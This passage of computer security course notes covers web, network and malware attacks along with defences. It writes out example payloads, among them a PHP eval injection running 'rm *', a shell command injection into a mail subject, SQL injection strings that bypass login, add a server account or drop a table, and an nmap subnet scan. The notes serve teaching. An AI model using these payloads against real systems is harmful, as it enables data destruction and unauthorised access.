Random value (choose once for whole process), must be hidden well
NULL bytes/EOF/etc. (string functions won't copy past canary)
You can activate stack canaries in gcc with -fstack-protector and -fstack-protector-strong.
You can also deactivate with -fno-stack-protector
StackGuard and ProPolice are more modern stack protection techniques. For
example, ProPolice also makes sure that on-stack pointers are put on lower addresses
than buffers
HTTP Basics

Browser Execution
Retrieve/load content
Render it by processing the HTML
Might run scripts, fetch more content, etc.
Respond to events
User actions: OnClick, OnMouseover
Rendering: OnLoad, OnBeforeUnload
Timing: setTimeout(), clearTimeout()
HTTP Cookies
Main mechanism to keep state across HTTP requests
Session cookies are valid until browser is closed
Persistent cookies are valid until an expiration date
Secure cookies are only sent over HTTPS connection

HttpOnly cookies are not visible by client side script language (like JavaScript)
Setting a cookie
Set a cookie with information in HTTP Header
Default scope of a cookie is the domain and path of setting URL
If previous cookie with same name, domain, and path then it is overwritten
Set a cookie dynamically server-side or client-side
Deleting a cookie
Set cookie's expiry date to the past
Browsers send all cookies such that:
Domain scope is a suffix of url-domain
Path is prefix of its url-path
Protocol is HTTPS if cookie is marked "secure"
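The three sending rules can be written as one predicate. This is a simplified sketch of the rules as stated here (real browsers follow stricter matching, for example on path boundaries); `should_send` and its parameters are hypothetical names:

```python
def should_send(cookie_domain: str, cookie_path: str, secure: bool,
                url_scheme: str, url_host: str, url_path: str) -> bool:
    """Decide whether a cookie accompanies a request to the given URL."""
    host = url_host.lower()
    domain = cookie_domain.lower().lstrip(".")
    # Domain scope must be a suffix of the URL's domain, on a label boundary.
    domain_ok = host == domain or host.endswith("." + domain)
    # Cookie path must be a prefix of the URL's path.
    path_ok = url_path.startswith(cookie_path)
    # Cookies marked "secure" only travel over HTTPS.
    scheme_ok = url_scheme == "https" or not secure
    return domain_ok and path_ok and scheme_ok

# A cookie scoped to example.com is also sent to blog.example.com.
assert should_send("example.com", "/", False, "http", "blog.example.com", "/post")
# A secure cookie is withheld from plain HTTP.
assert not should_send("example.com", "/", True, "http", "example.com", "/")
```

The suffix rule is what makes the scoping abuse possible: any subdomain can receive (and set) cookies scoped to the parent domain.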
Security Issues
No integrity
HTTPS cookies can be overwritten by HTTP cookies
Malicious clients can modify cookies
Scoping rules can be abused
blog.example.com can read/set cookies for example.com
Privacy
Cookies can be used to track you around the Internet
Susceptible to session hijacking if HTTP cookies sent in clear
Session Hijacking
The exploitation of a valid computer session - sometimes also called a session key - to
gain unauthorized access to information or services in a computer system
Unencrypted contents are very easy to retrieve, as such, use encryption when setting
session cookies
SessID = Enc(K, info) where K is server-side secret key and info contains user id,
expiration time, and other data
This doesn't prevent Firesheep hijacking so turn on HTTPS always
PHP Vulnerabilities
PHP command eval(cmd_str) executes string cmd_str as PHP code
//calc.php
$in = $_GET['exp'];
eval('$ans = ' . $in . ';');

http://example.com/calc.php?exp="11;system('rm *')"
//sendmail.php
$email = $_POST["email"];
$subject = $_POST["subject"];
system("mail $email -s $subject < /tmp/joinmynetwork");

http://example.com/sendmail.php?
email=abouttogetowned@ownage.com&subject="food</usr/passwd;ls"
File handling: example.com/file_handle.php?i=file.html
Global variables: example.com/globl_var.php?user="bob;$auth=1;"
Web Vulnerabilities
SQL injection inserts malicious SQL commands to read/modify a database
Cross-site Request Forgery (CSRF) in which Site A uses credentials for Site B to do
a bad thing
Cross-site Scripting (XSS) in which Site A sends victim client a script that abuses
honest Site B
SQL Injection
set ok = execute("SELECT * FROM Users
WHERE user='" & form("user") & "'
AND pwd='" & form("pwd") & "'");
if not ok.EOF
login success
else fail;

user = "' OR 1=1 --"


Easy login (-- tells SQL to ignore rest of line)
user = "'; exec cmdshell net user badge badpw add --"
Attacker gets an account on the database server if the SQL database is running with
sufficient permissions
user = "'; DROP TABLE Users --"
Deletes all customer information
Prevent SQL injection using prepared statements (parameterized queries)
$stmt = $db->prepare("select * from users
where username = :name and password = SHA1(CONCAT(:pass, salt))
limit 1;");
$stmt->bindParam(':name', $name);
$stmt->bindParam(':pass', $pass);
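The difference between string concatenation and a parameterized query can be reproduced with an in-memory SQLite database. The table layout, the sample user, and the function names are assumptions for this sketch, and the password is stored in the clear only to keep it short:

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    # Plaintext password only for brevity; store salted hashes in practice.
    db.execute("INSERT INTO Users VALUES ('alice', 's3cret')")
    return db

def login_vulnerable(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    # User input is pasted into the SQL text, so it can change the query.
    query = ("SELECT * FROM Users WHERE user='" + user +
             "' AND pwd='" + pwd + "'")
    return db.execute(query).fetchone() is not None

def login_safe(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    # Placeholders keep user input as data, never as SQL syntax.
    query = "SELECT * FROM Users WHERE user=? AND pwd=?"
    return db.execute(query, (user, pwd)).fetchone() is not None

db = make_db()
attack = "' OR 1=1 --"
assert login_vulnerable(db, attack, "")      # logs in without a password
assert not login_safe(db, attack, "")        # treated as a literal user name
```

With the attack string, the vulnerable query becomes `... WHERE user='' OR 1=1 --' AND pwd=''`, and everything after `--` is ignored as a comment.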

Cross-site Request Forgery (CSRF/XSRF)


Site A uses credentials for Site B to do a bad thing

Form post with cookie


User browser already logged onto victim site
User visits attacker site which forces user browser to send auth cookie to victim
site. This works because of cookie scoping rules
Login CSRF
Attacker creates host account on trusted domain
Attacker forges login request in victim's browser with the host account
credentials
Attacker now has access to any data or metadata the victim creates while their
browser is logged in with the host account
Defenses include secret validation tokens, referrer validation, and custom HTTP
headers
Secret Validation Tokens
Include token with large random value or HMAC of a hidden value sent to
client e.g. via cookie
The attacker cannot forge the token and the server validates it
Referrer Validation
Check that the referrer is from the correct domain
Lenient policy: allow if referrer is not present
Strict policy: disallow if referrer is not present
Problem is that referrers are often stripped since they may leak
information. On HTTPS to HTTP transitions the referrer is stripped. Clients and
networks might also strip referrers
Custom Headers (via AJAX)
Adds header entry: X-Requested-By: XMLHttpRequest
Server rejects request if entry is missing
This helps because, by default, requests to different domains are not
allowed (same-origin-policy)
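A secret validation token of the HMAC kind can be sketched as follows. Assumption: the hidden value is the user's session id and the server holds a key `SERVER_KEY`; both names and the functions are hypothetical:

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # hypothetical server-side secret

def issue_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Token embedded in forms served to this session: HMAC of the session id."""
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Server-side check when a state-changing request arrives."""
    expected = issue_token(session_id, key)
    return hmac.compare_digest(expected.encode(), token.encode())

token = issue_token("session-abc")
assert is_valid("session-abc", token)
# A token issued for the attacker's own session does not validate
# for the victim's session.
assert not is_valid("session-victim", issue_token("session-attacker"))
```

The forged cross-site request still carries the victim's cookie, but the attacker's page cannot read or compute the matching token, so the server rejects it.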
Cross-site Scripting (XSS)
Site A tricks client into running script that abuses honest site B
Reflected attacks (non-persistent) (e.g., links on malicious web pages)
Visit site -> receive malicious link -> click on link -> echo user input -> sends
valuable data
Stored (persistent) attacks (e.g., web forms with HTML)
Malicious script is stored on victim server -> request content -> receive malicious
script -> send valuable data
Defenses include input validation, output filtering/encoding, HTTPOnly cookies, Taint
mode, etc.
Input validation
Only allows what you expect
Output filtering/encoding
Remove/encode special characters, allow only safe commands
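Both defenses fit in a few lines. The sketch uses `html.escape` from the standard library for output encoding and an allow-list regular expression for input validation; the user-name rule and the function names are assumptions:

```python
import html
import re

def is_valid_username(value: str) -> bool:
    """Input validation: only allow what you expect (here 1-32 word chars)."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", value) is not None

def render_comment(user_input: str) -> str:
    """Output encoding: special characters become harmless HTML entities."""
    return "<p>" + html.escape(user_input, quote=True) + "</p>"

payload = "<script>alert(1)</script>"
assert not is_valid_username(payload)
assert render_comment(payload) == "<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>"
```

Encoding on output is the more robust of the two, since it stays correct even when an unexpected input slipped past validation or was stored earlier.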

Malware
Malicious code installed by a victim user that:
Fulfills malicious intent of author
Performs some unwanted activity on your system
Phishing means tricking the user into downloading malware, submitting CC or account
info to attacker, etc.
Malware is so prevalent today because data and code are mixed, a homogenous
computing base, unprecedented connectivity, a clueless user base, and it has become
profitable

Miscellaneous malware examples:


Keyloggers log keystrokes on a given system (e.g., to find passwords, account
number, etc.)
Adware collects information for commercial gain. It is often installed along with
normal software downloaded
Rootkits are designed to hide existence of malware
Computer Viruses
A virus is a program that reproduces its own code by attaching itself to other
executable files in such a way that the virus code is executed when the infected
executable file is executed
Viruses reproduce/infect then deliver some type of payload, similar to biological viruses
Typical virus actions include: displaying messages, deleting and/or manipulating files,
and installing additional malware/open backdoor
A memory-resident virus remains in memory as part of the operating system, until
system shuts down. It also reacts to system events

A boot sector infector is a computer virus that infects the boot sector, and is executed
every time disk is accessed/boot sector is loaded (e.g., Elk Cloner)
The boot sector is part of disk used to bootstrap the system or mount a disk.
Code in BS is executed when system sees disk for the first time
An executable infector is a virus that infects executable programs. The virus code is
appended or prepended to executable code and data (e.g., Chernobyl virus)
Stealth viruses conceal infection of files. For example, they intercept requests to
infected files, and make them look normal (e.g., 4096, IDF virus)
Stealth feature requires running the infected executable, so the virus may be detectable
as long as it has not been executed
To prevent detection from anti-virus software, an encrypted virus will encrypt the virus
code with a fresh cryptographic key at every infection, and decrypt at run-time before
executing
Because the decryption procedure doesn't change (only the encrypted portion and key do),
it can still be recognized; a polymorphic virus changes every time it is inserted into another program
Inserts bogus random instructions with no effect on the actual behavior, which change
every time the virus infects a new program. These actions may include dead
code insertion, instruction reordering, or instruction substitution
Macro viruses use macro-scripting languages in application documents
Trojans
Milder forms of viruses that are usually not self-replicating
They appear to provide a useful service but carry out malicious behavior, typically opening a
backdoor to the system (e.g., SMS.AndroidOS.Stealer.a, banking trojans)
Computer Worms
A program that copies itself from one computer to another (e.g., Morris worm)
Botnets
A network of private computers infected with malicious software and controlled as a
group without the owners' knowledge
Usage: spam, DDoS, SEO, traffic generation, etc.
Can make money through: rental, DDoS extortion, bulk traffic selling, click fraud, theft
of monetizable data, data ransom, product advertisement, etc.
Well-known botnets include Agobot (2002) and Storm Botnet (2007)
Anti-Virus Software
Helps you detect viruses on your computer
Signature-based detection compares machine code with a database of known viruses
Heuristic-based detection looks for typical virus-like machine code
Behavior-based detection looks for virus-like behavior
Sandbox detection tests the software in a virtual environment
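Signature-based detection can be sketched as a byte-pattern search. This is only a minimal illustration: the signature names and byte patterns below are made up, and real engines use much larger databases along with wildcards and hashes.

```python
# Hypothetical signature database: name -> byte pattern (illustrative values only).
SIGNATURES = {
    "Demo.TestPattern.A": bytes.fromhex("deadbeef4142"),
    "Demo.TestPattern.B": b"EVIL_MARKER",
}

def scan_bytes(data: bytes) -> list:
    """Return the names of all signatures whose pattern occurs in data."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]

clean = b"\x7fELF ordinary program bytes"
infected = clean + bytes.fromhex("deadbeef4142") + b" more bytes"

print(scan_bytes(clean))     # []
print(scan_bytes(infected))  # ['Demo.TestPattern.A']
```

A scanner of this kind only finds patterns it already knows, which is why encrypted and polymorphic viruses try to change their bytes on every infection.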
Components of anti-virus program:
Engines for various languages because malware comes in various forms (e.g.,
binary executables, Java applets, Flash videos)
File scanners to scan various types of files
Compressors and archivers because malware can come compressed
Packet filters and firewalls to prevent bots from contacting their C&C servers
Self protection mechanisms to prevent malware from disabling the anti-virus
An anti-virus program can discover known malicious patterns in programs, documents,
web pages, or network traffic, but it cannot discover new threats unless they are based
on old patterns
Malware Prevention
Use blacklists to recognize IP addresses that are involved in malware activity and
block any traffic directed to/from them
Protect against infected computers by telling users when a certain computer
they are trying to communicate with is known to be infected with malware
Protect against malicious servers by telling users whether the server/webpage
they are communicating with is malicious
Use user voting and reputation to pinpoint webpages, servers, or messages that are
malicious
Internet Protocol Stack

WiFi
Most common way to connect to a network
Implements IEEE 802.11 standards, a family of standards with different
bandwidth/throughput/frequencies
Protocol coordinates access to channels to avoid collisions
Logical units identified through so-called SSIDs (this is what you see when
connecting to a network)
Every signal can easily be captured through packet sniffing. A WiFi device can often
be put into monitor mode such that it sees every packet sent over a WiFi channel
The solution to this is WPA2
WPA2-PSK
Device and access point share a pre-shared secret PSK (aka PMK, pairwise master
key), derived from a passphrase and the SSID
Upon connect, a 4-way handshake protocol generates a temporary session key PTK
Encrypts datagrams using authenticated encryption (AES-based counter mode
+ CBC-MAC) with key = PTK
Each connection uses a fresh PTK
Given an intercepted handshake interaction, it is possible to brute-force the
passphrase and obtain the PTK. This is because MIC is a MAC on public
information + password guess
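The offline guessing attack can be sketched as follows. The PMK derivation (PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, 4096 iterations, 32 bytes) is the standard WPA2-PSK one. The MIC check is deliberately simplified and is an assumption for illustration: the real protocol first derives the PTK from the PMK, both nonces, and both MAC addresses, and keys the MIC with part of the PTK. The SSID, passphrase, and handshake bytes are made-up values.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def toy_mic(pmk: bytes, public_handshake: bytes) -> bytes:
    # Simplification (assumption): keyed directly with the PMK instead of the PTK.
    return hmac.new(pmk, public_handshake, hashlib.sha1).digest()[:16]

def dictionary_attack(ssid, public_handshake, observed_mic, wordlist):
    """Try each candidate passphrase offline; return the one whose MIC matches."""
    for guess in wordlist:
        candidate = toy_mic(derive_pmk(guess, ssid), public_handshake)
        if hmac.compare_digest(candidate, observed_mic):
            return guess
    return None

ssid = "ExampleNet"                      # hypothetical network name
handshake = b"nonces-and-mac-addresses"  # stands in for the sniffed public values
mic = toy_mic(derive_pmk("sunshine1", ssid), handshake)

print(dictionary_attack(ssid, handshake, mic, ["password", "letmein1", "sunshine1"]))
```

Everything the attacker needs besides the passphrase is public, so each guess can be checked without talking to the access point.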
WPA-EAP
EAP stands for Extensible Authentication Protocol; this mode is known as WPA-Enterprise
Authentication requires an online authentication server (Remote Authentication Dial-In
User Service, RADIUS, server)
The RADIUS server can rely on an existing authentication backend
(LDAP/Active Directory)
A certificate needs to be given reliably to the user to authenticate the network
IP Protocol (IPv4)
Connectionless: no state
Unreliable: no guarantees
ICMP (Internet Control Message Protocol): error messages, etc.
Security Issues:
Anyone can talk to anyone
No source address authentication in general (spoofing can occur)
IP allows datagrams of size from 20 bytes up to 65535 bytes, but some link layers only
allow an MTU (maximum transmission unit) of 1500 bytes. IP uses fragmentation to
deal with this, figuring out the MTU of the next link and fragmenting packets if necessary
into smaller chunks
Fragmentation attacks:
Ping of death: allows sending a 65,536-byte packet, overflowing the buffer
This is because the max offset is 65528, but the last fragment can still include
more data that goes beyond the end of the buffer
Teardrop DoS: mangled fragmentation crashes reconstruction code (sets
offsets so that two packets have overlapping data)
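The arithmetic behind both attacks can be checked with a short sketch. The 13-bit fragment offset field counts 8-byte units, which gives the 65528 figure; the helper names and the example fragment sizes are illustrative assumptions.

```python
MAX_IP_DATAGRAM = 65535          # limit imposed by the 16-bit total-length field
MAX_FRAGMENT_OFFSET = 8191 * 8   # 13-bit offset field, counted in 8-byte units

def reassembled_end(offset_bytes: int, payload_len: int) -> int:
    """Byte position just past the end of a fragment in the reassembly buffer."""
    return offset_bytes + payload_len

def overlaps(frag_a, frag_b) -> bool:
    """True if two (offset, length) fragments cover some of the same bytes."""
    (a_off, a_len), (b_off, b_len) = frag_a, frag_b
    return a_off < b_off + b_len and b_off < a_off + a_len

print(MAX_FRAGMENT_OFFSET)                  # 65528

# Ping of death: a last fragment at the maximum offset carrying 100 bytes.
end = reassembled_end(MAX_FRAGMENT_OFFSET, 100)
print(end, end > MAX_IP_DATAGRAM)           # 65628 True

# Teardrop: the second fragment lies inside the first one.
print(overlaps((0, 36), (24, 4)))           # True
```

Reassembly code that trusts the offsets without these two checks is the kind of code these attacks target.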
Prevent spoofing:
Use authentication based on key exchange between the machines on your
network; something like IPsec will significantly cut down on the risk of spoofing
Use an access control list to deny private IP addresses on your downstream
interface
Implement filtering of both inbound and outbound traffic
Configure your routers and switches, if they support such configuration, to reject
packets originating from outside your local network that claim to originate from
within
Enable encryption sessions on your router so that trusted hosts that are outside
your network can securely communicate with your local hosts
Denial of Service (DoS) Attacks
Goal of these attacks is to prevent legitimate users from accessing victim servers
ICMP ping flood achieves this by sending ICMP pings so fast that the victim's
resources are overwhelmed
An ICMP echo message must be answered with an echo reply containing the
exact data received in the request message
To avoid ingress filtering: an attacker can send a packet with a fake source IP so
the packet will get routed correctly, but the replies will not
DoS reflection attacks bounce attacks off another server
DoS works better when there is asymmetry between victim and attacker. This way
an attacker uses few resources to cause the victim to consume a lot of resources
BCP 38
Upstream ingress filtering to drop spoofed packets
Before forwarding on packets, check at ingress that source IP is legitimate
Doesn't stop DoS attacks because:
Requires widespread adoption and compliance
More and more DoS attacks do not use spoofing but instead rely on botnets and
distributed DoS attacks (DDoS)
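The ingress check itself is simple. A minimal sketch, assuming a single customer prefix per router port (the prefix is a documentation range chosen for illustration):

```python
import ipaddress

# Hypothetical prefix assigned to the customer behind this router port.
CUSTOMER_PREFIX = ipaddress.ip_network("203.0.113.0/24")

def ingress_allows(source_ip: str) -> bool:
    """Forward a packet only if its source address belongs to the customer prefix."""
    return ipaddress.ip_address(source_ip) in CUSTOMER_PREFIX

print(ingress_allows("203.0.113.25"))   # True: legitimate source
print(ingress_allows("198.51.100.9"))   # False: spoofed source, dropped
```

The filter only helps at the network where the spoofed packet enters, which is why it depends on widespread adoption.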
TCP (Transmission Control Protocol)
Connection-oriented: state initialized during handshake and maintained
Reliability is a goal: generates segments, times out segments that aren't acked,
checksums headers, reorders received segments if necessary, flow control
TCP handles missing messages, retransmissions, etc.
Connections
Every connection is labeled by ClientIP:ClientPort and ServerIP:ServerPort
When new connection created by client (new socket), typically client chooses
random ClientPort
Server must be listening on ServerPort, creating a passive socket
New connections handled by separate thread
Socket simply looks like a file with read/write interface once connection is open
Connection Logic
Packets sent from client/server are assigned increasing sequence numbers
seqC and seqS, initialized when establishing connection
Also each packet contains as the acknowledgement number the sequence
number of the previously received packet + 1
TCP Handshake
Protocol establishes a TCP session between Client C and Server S
SYN = syn flag set
ACK = ack flag set
Sequence numbers are the main mechanism for reliability, allowing us to know
how packets are to be ordered
Because the server needs to allocate memory to remember that a SYN/ACK
message was sent back to the client, it is susceptible to TCP SYN floods
TCP Teardown

TCP SYN Floods
If you overload a server with TCP SYN packets you can perform a DoS attack
A server maintains state for each SYN packet for some amount of time. If it is
not cleverly implemented then the server will run out of memory
You can use a SYN cookie to fight against SYN floods. The server won't allocate
memory for the SYN until it receives the correct ACK response, and it will recreate the
SYN entry from the cookie
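The idea can be sketched with a keyed hash. This is a simplified illustration, not the exact construction used by any operating system: real SYN cookies also encode a time counter and the MSS. The function names, addresses, and the use of HMAC-SHA256 are assumptions.

```python
import hashlib
import hmac
import os

SERVER_SECRET = os.urandom(16)   # known only to the server

def make_cookie(client_ip, client_port, server_ip, server_port, client_isn,
                secret=SERVER_SECRET):
    """Derive the server's initial sequence number from the 4-tuple and client ISN."""
    msg = f"{client_ip}:{client_port}>{server_ip}:{server_port}|{client_isn}".encode()
    digest = hmac.new(secret, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")   # fits the 32-bit sequence number field

def ack_is_valid(client_ip, client_port, server_ip, server_port, client_isn,
                 ack_number, secret=SERVER_SECRET):
    """The final ACK must acknowledge cookie + 1; nothing was stored per SYN."""
    cookie = make_cookie(client_ip, client_port, server_ip, server_port,
                         client_isn, secret)
    return ack_number == (cookie + 1) % 2**32

conn = ("198.51.100.7", 40000, "192.0.2.1", 80, 1234)
cookie = make_cookie(*conn)                         # sent as the SYN/ACK sequence number
print(ack_is_valid(*conn, (cookie + 1) % 2**32))    # True: genuine client
print(ack_is_valid(*conn, (cookie + 2) % 2**32))    # False: wrong acknowledgement
```

Because the cookie can be recomputed from the ACK, the server only allocates connection state after the client has proven it received the SYN/ACK.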
Predictable Sequence Numbers
4.4BSD used predictable initial sequence numbers (ISN)
At system initialization, set ISN to 1
Increment ISN by 64,000 every half-second
A clever attacker can forge a FIN packet or forge some application-layer packet
(assuming spoofing is possible)
A good fix is to use a random ISN for every connection
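Why this scheme is predictable can be shown in a few lines. The sketch models only the rule stated above (start at 1, add 64,000 every half-second); the function name and the chosen time values are illustrative.

```python
def bsd_isn(half_seconds_since_boot: int) -> int:
    """ISN under the scheme described above: start at 1, add 64,000 per half-second."""
    return (1 + 64_000 * half_seconds_since_boot) % 2**32

# The attacker opens one legitimate connection and observes the server's ISN...
observed = bsd_isn(1000)

# ...and can then compute the ISN the server will use half a second later.
predicted_next = (observed + 64_000) % 2**32
print(predicted_next == bsd_isn(1001))   # True
```

With a random ISN per connection, a single observation tells the attacker nothing about the next value.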
Domain Name System (DNS)
We don't want to have to remember all IP addresses, so the DNS was created
It is a hierarchical system starting from root name servers

A root name server is a name server for the root zone of the DNS of the Internet
It directly answers requests for records in the root zone and answers other
requests by returning a list of the authoritative name servers for the appropriate
top-level domain (TLD)
DNS cache poisoning is when an attacker exploits a DNS server that uses a predictable
UDP port to redirect traffic meant for one place to another by abusing the victim's DNS
server
You flood the victim name server with forged answers, guessing the QID, until
one of them is correct, after which the victim is routed to a malicious site
You can also poison the cache for an NS record instead and take over the entire
second-level domain
Defenses against DNS cache poisoning include:
Randomizing UDP ports (e.g., Dan Bernstein's DJBDNS)
Randomizing QIDs (there are 65,536 possible ones)
DNSSEC: cryptographically sign DNS responses and verify via chain of trust from
roots down
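A rough calculation shows why randomizing the port as well as the QID helps. The sketch assumes the attacker sends distinct guesses during one race window; the figure of 60,000 usable source ports is an illustrative assumption.

```python
QID_SPACE = 2**16   # 65,536 possible query IDs

def hit_probability(forged_answers: int, source_ports: int = 1) -> float:
    """Chance that one of `forged_answers` distinct guesses matches (QID, port)."""
    space = QID_SPACE * source_ports
    return min(1.0, forged_answers / space)

fixed_port = hit_probability(1000)             # predictable port: only the QID is secret
random_port = hit_probability(1000, 60_000)    # port must be guessed too

print(f"{fixed_port:.4%}")
print(f"{random_port:.8%}")
```

Port randomization multiplies the search space, while DNSSEC removes the guessing game entirely by making forged answers fail signature verification.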
Classless Inter-Domain Routing (CIDR) Addressing
128.168.0.0/24
a.b.c.d/x
x indicates the number of bits used for the routing prefix
IP addresses with the same /x prefix share some portion of their route
Prefixes are used to set up hierarchical routing:
An organization assigned a.b.c.d/x manages addresses prefixed by a.b.c.d/x
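The example prefix above can be explored with Python's standard ipaddress module; the two host addresses are arbitrary picks for illustration.

```python
import ipaddress

net = ipaddress.ip_network("128.168.0.0/24")

print(net.prefixlen)        # 24 bits of routing prefix
print(net.num_addresses)    # 256 addresses share that prefix
print(net.netmask)          # 255.255.255.0

print(ipaddress.ip_address("128.168.0.77") in net)   # True
print(ipaddress.ip_address("128.168.1.77") in net)   # False
```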
Autonomous systems (AS) are organizational building blocks, each of which consists of a
collection of IP prefixes under a single routing policy
Within an AS, routing might use RIP (Routing Information Protocol) or OSPF (Open Shortest Path
First); between ASes, BGP (Border Gateway Protocol) is used
BGP
Policy-based routing: AS sets policy about how to route based on economic, security,
and political considerations
BGP routers use TCP connections to transmit routing information
Iterative announcement of routes
BGP is unauthenticated, so anyone can advertise any route. These false routes will
also be propagated, allowing for IP hijacking
AS announces it originates a prefix it shouldn't
AS announces it has a shorter path to a prefix
AS announces a more specific prefix
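The "more specific prefix" case works because routers forward along the longest matching prefix. A minimal sketch of that rule, with made-up AS numbers and documentation prefixes (real BGP route selection considers more attributes than prefix length):

```python
import ipaddress

def best_route(destination: str, routes: dict) -> str:
    """Pick the origin whose announced prefix matches the destination most specifically."""
    addr = ipaddress.ip_address(destination)
    matching = [ipaddress.ip_network(p) for p in routes
                if addr in ipaddress.ip_network(p)]
    longest = max(matching, key=lambda network: network.prefixlen)
    return routes[str(longest)]

# Hypothetical routing table: announced prefix -> origin AS.
routes = {"198.51.100.0/24": "AS64500 (legitimate)"}
print(best_route("198.51.100.10", routes))   # AS64500 (legitimate)

# The hijacker announces a more specific prefix covering the same address.
routes["198.51.100.0/25"] = "AS64666 (hijacker)"
print(best_route("198.51.100.10", routes))   # AS64666 (hijacker)
```

Addresses outside the /25 (for example 198.51.100.200) still follow the legitimate /24, so a hijack of this kind can be partial and hard to notice.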
Target Acquisition
To find vulnerable server(s) within a target organization we can first start with one or
more publicly routable IP addresses
WHOIS queries are a good way to find them, and can be used to identify
the blocks of IP addresses the organization owns
After you have identified the target IPs (or range of IPs) you can perform:
Host discovery: narrow a broad swath of potential IPs to the ones that have hosts
associated with them
Service discovery: for a particular host, identify running services
OS fingerprinting: identify the OS software version running
Application fingerprinting: identify the software running at a higher
level (e.g. Apache version)
NMAP
Network mapping tool
The de-facto standard for network reconnaissance and testing with numerous built-in
scanning methods
TCP connect() Scan [-sT]
Default for unprivileged users
Initiate proper TCP connection and see whether you can connect
SYN Stealth Scan [-sS]
Only send SYN packet, does not register as connection on other end
Service Detection [-sV]
Port Scan Without Host Discovery [-Pn]
OS Fingerprinting [-O]
NMAP status messages
open: host is accepting connections on that port
closed: host responds to NMAP probes on port, but doesn't accept connections
filtered: host may be behind firewall or not up at all, means that NMAP couldn't
get packets through to host on that port
If a port says tcpwrapped then a full TCP handshake was completed but the remote
host closed the connection without receiving any data
nmap -Pn -sT -p 22 192.168.1.0/24
Tries all IPs, one by one
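What a connect() scan does for a single host and port can be sketched with the standard socket module. This is an illustration of the technique, not how NMAP is implemented; the function name, the timeout, and the mapping of errors to the three states are assumptions.

```python
import socket

def tcp_connect_scan(host: str, port: int, timeout: float = 1.0) -> str:
    """Attempt a full TCP handshake and classify the port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return "open"          # handshake completed
        except ConnectionRefusedError:
            return "closed"        # host answered with a RST
        except OSError:
            return "filtered"      # timeout or unreachable: no usable answer

# Example usage against a host you control:
# for last_octet in range(1, 255):
#     print(last_octet, tcp_connect_scan(f"192.168.1.{last_octet}", 22))
```

Because the handshake is completed, this kind of scan shows up as a normal connection in the target's logs, unlike the SYN scan described above.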
Firewall
Prevents outsiders from gaining information about the inner workings of a network
Packet filtering
Decision to drop/allow is packet-based
Stateful filtering
Attempts to understand logic of the connection (e.g., FTP triggers connection to
higher port, that would normally be disallowed but FW would recognize this as
part of allowed FTP connection)
Requires keeping state
Vulnerable to DoS (similar to SYN floods)
Extreme example of this: Network-address translation (NAT)
Network behind the firewall uses a different (non-public) IP range
Firewall keeps connection table
Network DMZ
DMZ (demilitarized zone) helps isolate public network components from private
network components
Firewall rules to disallow traffic from the Internet to internal services
Allow/deny rules based on src/dst (IPs + ports), protocol, etc.
Idle Scans
A TCP port scan method that consists of sending spoofed packets to a computer to
find out what services are available. This is accomplished by impersonating another
computer called a "zombie" (that is not transmitting or receiving information) and
observing the behavior of the "zombie" system
Main idea:
1. Determine IPID of a zombie via SYN/ACK
2. Send SYN spoofed from zombie
3. Determine new IPID of zombie via SYN/ACK
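The three steps can be simulated without any network traffic. The sketch assumes a zombie with a sequential IPID counter that is otherwise idle; the class and function names are hypothetical.

```python
class Zombie:
    """Idle host whose IP ID counter increases by one for every packet it sends."""
    def __init__(self, ipid: int = 1000):
        self.ipid = ipid

    def send_packet(self) -> int:
        self.ipid = (self.ipid + 1) % 2**16
        return self.ipid

def idle_scan(zombie: Zombie, target_port_open: bool) -> str:
    before = zombie.send_packet()   # step 1: probe the zombie, read IPID from its reply
    if target_port_open:
        # Step 2: the target answers the spoofed SYN with a SYN/ACK sent to the
        # zombie, and the zombie replies with a RST, consuming one IPID.
        zombie.send_packet()
    # If the port is closed, the target sends a RST, which the zombie ignores.
    after = zombie.send_packet()    # step 3: probe the zombie again
    return "open" if (after - before) % 2**16 == 2 else "closed or filtered"

print(idle_scan(Zombie(), target_port_open=True))    # open
print(idle_scan(Zombie(), target_port_open=False))   # closed or filtered
```

The scanner never sends a packet to the target from its own address, and the inference only works while the zombie's counter is predictable.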

Can prevent a system from being a zombie by:
Random (instead of sequential) IPIDs
Use intrusion-detection systems (IDS) to identify unwanted traffic patterns
Two broad classes:
Anomaly detection: determine what normal traffic looks like and flag
abnormal traffic
Signature-based: define some explicit traffic patterns as bad and flag
them
Miscellaneous
Given an RSA modulus $N = PQ$ and a valid public exponent $e$, to encrypt a
message $m \in \mathbb{Z}_N$, we first choose a random $r$ from $\mathbb{Z}_N$ and compute the ciphertext as
$c = (m \cdot r)^e \bmod N$. Is this a good idea?
Terrible idea because the random $r$ completely hides the message. We can
recover $m \cdot r$ given $d$ but we have no means of removing the randomness $r$ to
recover $m$
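A toy example with textbook-sized numbers shows the problem. The primes, exponent, message, and randomness are arbitrary small values chosen for illustration and offer no security; `pow(e, -1, phi)` needs Python 3.8 or later.

```python
p, q, e = 61, 53, 17
N = p * q
d = pow(e, -1, (p - 1) * (q - 1))   # private exponent

m, r = 65, 7                        # message and the sender's random value
c = pow((m * r) % N, e, N)          # proposed encryption

decrypted = pow(c, d, N)
print(decrypted == (m * r) % N)     # True: the receiver recovers m * r
print(decrypted == m)               # False: m itself is not recovered

# A different pair gives the same product, so the ciphertext is ambiguous.
print((5 * 91) % N == (m * r) % N)  # True
```

Since the receiver never learns r, every message with a matching product is an equally valid decryption.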
Is MAC(M) = SHA-256(M) XOR K a good idea?
(M,T) = (M, MAC(M)) = (M, SHA-256(M) XOR K)
Easy to recover K = T XOR SHA-256(M)
